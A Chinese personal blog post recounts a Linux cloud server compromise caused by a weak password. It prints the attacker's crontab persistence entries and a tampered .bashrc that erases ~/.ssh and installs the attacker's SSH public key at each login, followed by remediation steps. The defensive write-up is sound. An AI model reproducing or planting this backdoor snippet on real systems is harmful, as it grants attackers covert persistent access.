Linux服务器被入侵
2019-08-05 本文已影响0人
virct
起因
今天登录自己的云服务器,发现一个进程Cpu占用100%,使用top命令后发现是cron进程干的。遂Kill -9该进程。由于服务器密码使用了两位数的弱密码因此服务器被hack也是情理之中。
问题排查
检查crontab发现一些异常的任务,似乎就是这些任务不停的消耗着计算机的资源
sudo crontab -l
0 0 */3 * * /root/.firefoxcatche/a/upd>/dev/null 2>&1
@reboot /root/.firefoxcatche/a/upd>/dev/null 2>&1
5 8 * * 0 /root/.firefoxcatche/b/sync>/dev/null 2>&1
@reboot /root/.firefoxcatche/b/sync>/dev/null 2>&1
#5 1 * * * /tmp/.X13-unix/.rsync/c/aptitude>/dev/null 2>&1
删除掉相应目录,检查syslog未发现其他异常,但是原来的ssh无法免密登录,之后发现.ssh / authorized_keys中原来的公钥被篡改,但是每次设置完之后重新登录还是登录不上,最后发现该用户的.bashrc被篡改为
set +o history
export PATH=/home/user/.bin:$PATH
cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod 700 .ssh && cd .ssh && chmod 600 authorized_keys && cd ~
这样每次用户登录就会将ssh更改为hacker的公钥,hacker就能随意访问你的服务器了。
安排
-
添加防火墙,阻止除端口22以外的所有传出连接以及您认为必要的其他连接,并启用fail2ban,这是一个在X尝试密码失败后禁止IP地址的程序
-
杀死所有cron作业: ps aux | grep cron然后杀死出现的PID
-
更改密码
这台服务器是个人平时用来写代码的,因此没有什么重要信息,如果是生产环境的话建议更加详细的排查,经过上面的修复之后系统看起来运行正常中